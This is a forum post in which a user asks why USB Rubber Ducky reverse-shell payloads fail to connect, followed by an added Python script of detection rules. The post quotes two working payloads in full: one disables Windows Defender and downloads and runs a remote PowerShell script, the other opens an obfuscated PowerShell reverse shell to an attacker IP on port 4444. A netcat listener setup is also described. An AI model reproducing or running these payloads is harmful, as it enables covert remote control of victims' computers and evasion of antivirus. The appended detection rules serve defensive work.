Problem with Reverse shell - No connection


Dominik75

Hello forum members,

Following YouTube videos on "Get a Reverse Shell with the USB Rubber Ducky" by downloading payloads from https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky+remote-access and REVERSEDUCKY loads, I could not properly make any of the payloads for remote access work. I did everything like in the videos in this regard and the included payloads on the HAK5 website. Both computers are on the same network. I put a Rubber Ducky into my Windows computer (you can see that something is happening), but on the second computer (the attacker), despite the fact that the server works (python -m http.server 8000, and in the second panel nc -l -p 4444), unfortunately I cannot connect to Windows through the shell. Payload.ps1 is on the server, of course. Does it matter? I also have ESET antivirus installed. I am asking for any tips.

Sample loads:

REM Turn off Windows Defender and start reverse shell
REM
DELAY 1000
GUI r
DELAY 200
REM Start an elevated powershell instance which will disable Windows Defender.
STRING powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs
ENTER
DELAY 1000
REM if you need administrator [left, enter and delay 1000]
LEFT
ENTER
DELAY 1000
ALT y
DELAY 1000
GUI r
DELAY 100
STRING powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString('http://my_IP/payload.ps1');"
ENTER
STRING exit
ENTER

Another load:

REM       ReverseDucky2
REM       Version 1.3
REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM       Author: 0iphor13

REM       Reverse shell executed in the background
REM       Fill in Attacker-IP and Port in Line 19
REM       DON'T FORGET TO START LISTENER


DELAY 1500
GUI r
DELAY 500
STRING powershell -NoP -NonI -W hidden
DELAY 250
ENTER

DELAY 200
STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("my_IP",4444);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s
DELAY 100
STRING .REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt
DELAY 100
STRING -STriNG);$x=$z+"PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE()
DELAY 100
ENTER
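
For defenders reading this thread: the command lines these two payloads type are distinctive, and the sketch below (an added example, not part of the original post or of the Hak5 payloads) flags them in text taken from process command-line logs or PowerShell script block logs. The rule names, function names and sample lines are constructed for illustration; the sample lines reuse strings from the payloads quoted above.

```python
import re

# Rules keyed to strings in the two payloads above. All matching is
# case-insensitive because the second payload randomizes letter case.
RULES = {
    # -w, -W, -WindowStyle and other spellings beginning with -w, then "hidden"
    "hidden_window": re.compile(r"powershell(\.exe)?\s.*?-w[a-z]*\s+hidden", re.I),
    # Set-MpPreference with an abbreviated -DisableRealtimeMonitoring
    "defender_tamper": re.compile(r"set-mppreference\s.*?-disablerea", re.I),
    # IEX / Invoke-Expression fed by WebClient.DownloadString
    "download_cradle": re.compile(
        r"\b(iex|invoke-expression)\b.*downloadstring\s*\(", re.I),
    # TCP client object created directly from PowerShell
    "raw_tcp_client": re.compile(
        r"new-object\s+(-typename\s+)?system\.net\.sockets\.tcpclient", re.I),
}

def classify(line):
    """Return the sorted names of every rule that matches one log line."""
    return sorted(name for name, rx in RULES.items() if rx.search(line))

def triage(lines):
    """Return (line, hits) pairs for lines matching at least one rule."""
    return [(line, hits) for line in lines if (hits := classify(line))]

# Constructed sample input: four lines built from the payloads above,
# followed by two benign lines that must not alert.
SAMPLE = [
    "powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs",
    "powershell -w hidden \"IEX (New-Object Net.WebClient).DownloadString('http://my_IP/payload.ps1');\"",
    "powershell -NoP -NonI -W hidden",
    '$c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("my_IP",4444);$s=$c.GetSTreAm()',
    r"powershell -NoProfile -File C:\Scripts\backup.ps1",
    "Get-MpPreference | Select DisableRealtimeMonitoring",
]

if __name__ == "__main__":
    for line, hits in triage(SAMPLE):
        print(", ".join(hits), "<-", line)
```

The second payload types its socket code into an already running PowerShell prompt, so process command-line logging records only the `-W hidden` launch; the `TCPClient` text is visible only where script block logging is enabled.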

Archived

This topic is now archived and is closed to further replies.